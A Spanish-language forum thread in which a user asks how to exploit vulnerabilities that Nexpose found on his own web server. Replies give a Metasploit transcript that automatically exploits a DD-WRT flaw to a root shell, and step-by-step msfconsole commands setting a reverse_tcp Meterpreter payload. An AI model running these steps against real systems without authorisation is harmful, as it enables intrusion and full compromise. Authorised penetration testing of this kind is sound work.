Hola a todos quisiera saber que puedo hacer despues que ya encuentro las vulnerabilidad para lanzar el xploit y ver que es lo que hace con el ataque es que no se como usar bien el msfconsole y como compilar el codifgo que me da el Nexpose para expotar esta vulnerabilidad.

Quiero ir probando mi servidor web hasta que ya no tenga agujeros pero para esto necesito probar q esta mal mal, ayuda please..

Saludos,

Integra el plugin Nexpose con msfconsole,

msf> db_create
The specified database already exists, connecting
Successfully connected to the database
File: /home/username/.msf3/sqlite3.db


msf> load nexpose
NeXpose integration has been activated
Successfully loaded plugin: nexpose


msf> nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
Connecting to NeXpose instance at 127.0.0.1:3780 with username <USERNAME>...


msf > nexpose_scan 192.168.0.100
Scanning 1 addresses with template pentest-audit in sets of 32
Completed the scan of 1 addresses


msf > db_autopwn -t -x
Analysis completed in 1.6098849773407 seconds (5 vulns / 1777 refs)
Matched exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.100:80..


msf > db_autopwn -t -x -e -r
The last three steps can be combined into a single command:

msf > nexpose_scan -x 192.168.0.100
Scanning 1 addresses with template pentest-audit in sets of 32
Completed the scan of 1 addresses
Launching an automated exploitation session
(module output)
Command shell session 1 opened (192.168.0.X:6480 -> 192.168.0.100:2101)

Successful exploits result in Metasploit sessions:

msf > sessions -l -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.0.X:9885 -> 192.168.0.100:2104 linux/http/ddwrt_cgibin_exec

msf > sessions -i 1
Starting interaction with 1...
id
uid=0(root) gid=0(root)


bytes

Dino

Dios, soy de bajo nivel si me pudieras ahi decir que es lo que realmente realizamos?

Mas bien con esto qe posteas ya tenemos conectado a Nexpuse y cuando me sale el exploit que necsito usar en Nexpose el solo lo compila?

U ejemplo del Exploit que me dice que tengo que usar en los reportes de vulnerabilidades, luego me indica el exploit le doy click y me envia a una pagina con el codigo del Exploit hecho en C++ y de ahi no paso :(

Dios alguien podria darme una mano con esto?

Algo mas especifico y llebado de la mano para realizarlo?

Saludos.

para compilar el programa:
make
make config
sudo make install
el uso de metasploit es muy simple:
sudo ./msfconsole --->nos abre el programa (ojo, tienes que estar en la carpeta de metasploit)

use exploit/winndows/smb/***** ----> exploit que sirva para tu server
set RHOST *.*.*.* ----> ip de server
show options ----> te muestra todas las opciones de ese exploit, las marcadas con YES son obligatorias de rellenar

set PAYLOAD windows/meterpreter/reverse_tcp ----> este es mi prefe, pero tienes un monton, para saber cuales (show payload)

set LHOST *.*.*.* ----> tu ip, desde la que atacas

tienes mas opciones para comfigurar, como los puertos, directorios, .... con (show options ) veras todas las opciones, para modificarlas (set VARIABEL valor)

exploit ---> para ejecutarlo

suerte.

Asi es claro esto ya lo sabia Ruben lo que pasa es como sincronizarlo con el Nexpose usando el plugin del mismo a como lo comentaba Dinosauro.

Saludos.